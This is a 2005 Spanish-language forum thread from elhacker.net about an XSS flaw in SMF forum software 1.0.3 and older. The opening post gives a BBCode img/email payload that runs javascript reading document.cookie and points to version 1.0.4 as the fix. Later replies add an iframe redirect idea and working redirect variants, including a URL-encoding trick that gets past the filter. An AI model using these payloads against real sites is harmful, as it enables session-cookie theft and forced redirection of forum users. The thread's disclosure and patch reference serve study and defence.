SMF <= 1.0.3 XSS Injection

Tema destacado: Seguir a @elhackernet

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderador: berz3k)

SMF <= 1.0.3 XSS Injection

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: SMF <= 1.0.3 XSS Injection (Leído 1,028 veces)

darksteel-

Desconectado

Mensajes: 142

¡Amo YaBB SE!

SMF <= 1.0.3 XSS Injection

« en: 20 Junio 2005, 21:37 »

Hola gente, pues ya que salio la Smf 1.0.4 para reparar este Bug Xss, y ya esta la 1.0.5 en unos días, pues lanzare el Bug y el explot para esta versión (1.0.3 and OLD).

Author: Unknow (desconocido).

Cita de: [darksteel

date=1118006352]
Hola bueno, se confirmo la vulnerabilidad xss en los foros smf.

por ahora el exploit no será publicado hasta que haya un parche. No se preocupen es uan tonteria.

Vendor: Simplemachines.org
Notify: YES
Exploit: YES

Impacto:
Subs.php - BBC

Exploit:

Código:

[img]http://s.d[email]sa@sa/style=background:url(javascript:alert(document.cookie));[/img][/email]

Solución
Actualizar SMF 1.0.4
www.simplemachines.org

darksteel-

Fuente: http://foro.cmh-ip.net/index.php/topic,89.0.html

darksteel-


« Última modificación: 20 Junio 2005, 21:39 por darksteel- »	En línea

easycreations.org

alb3rt0

Desconectado

Mensajes: 217

Re: SMF <= 1.0.3 XSS Injection

« Respuesta #1 en: 20 Junio 2005, 22:11 »

Podrias explicar como funciona?


	En línea

cerorar

Desconectado

Mensajes: 24

www.portalcero.com

Re: SMF <= 1.0.3 XSS Injection

« Respuesta #2 en: 20 Junio 2005, 23:10 »

podeis tambien explicarme a mi como os funciona eso

****SPAM****


« Última modificación: 20 Junio 2005, 23:15 por Cobac »	En línea

Don Kaka

Desconectado

Mensajes: 25

Re: SMF <= 1.0.3 XSS Injection

« Respuesta #3 en: 21 Junio 2005, 17:22 »

¿podría hacerse algo así komo?
</script><iframe src='url de pagina kon redireccionamiento'>

o no?

respondan


	En línea

._hack1ng iz n0t a crim3._

Morris

Ex-CoAdmin y
Ex-Staff

Desconectado

Mensajes: 1.966

Re: SMF <= 1.0.3 XSS Injection

« Respuesta #4 en: 21 Junio 2005, 17:25 »

¿Cómo hacer lameradas?
Clic AQUI


	En línea

Carta Poder
Ejemplos
Memorandum
Carta Recomendacion
www.ejemplode.com/12-clases_de_espanol/

orphen_nb

Desconectado

Mensajes: 133

Re: SMF <= 1.0.3 XSS Injection

« Respuesta #5 en: 21 Junio 2005, 17:56 »

Probando me he dado cuenta de que no funciona haciendo así (al menos a mi):

Código:

[img]http://s.d[email]sa@saaaa/style=background:url(javascript:location("http://www.google.es"));[/img][/email]

Sin embargo, si "ciframos" la web a la que queremos direccionar en formato de URL desde esta web por ejemplo (URL Encode): http://www.indaya.com/modules/coder/index.php funciona perfectamente:

Código:

[img]http://s.d[email]sa@saaaa/style=background:url(javascript:location("http%3A%2F%2Fwww.google.es"));[/img][/email]

Parece ser que reconoce de alguna manera el http:// y no funciona no se por qué pero al convertirlo a URL esto no ocurre

Saludos


« Última modificación: 21 Junio 2005, 17:57 por orphen_nb »	En línea

Human knowledge belongs to the world

Don Kaka

Desconectado

Mensajes: 25

Re: SMF <= 1.0.3 XSS Injection

« Respuesta #6 en: 21 Junio 2005, 18:54 »

Citar

¿Cómo hacer lameradas?
Clic AQUI

diskulpa morris, solo trato de aprender cosas que tu ya sabes.

gracias orphen_nb. por explikarme


	En línea

._hack1ng iz n0t a crim3._

Páginas: [1]

Ir a: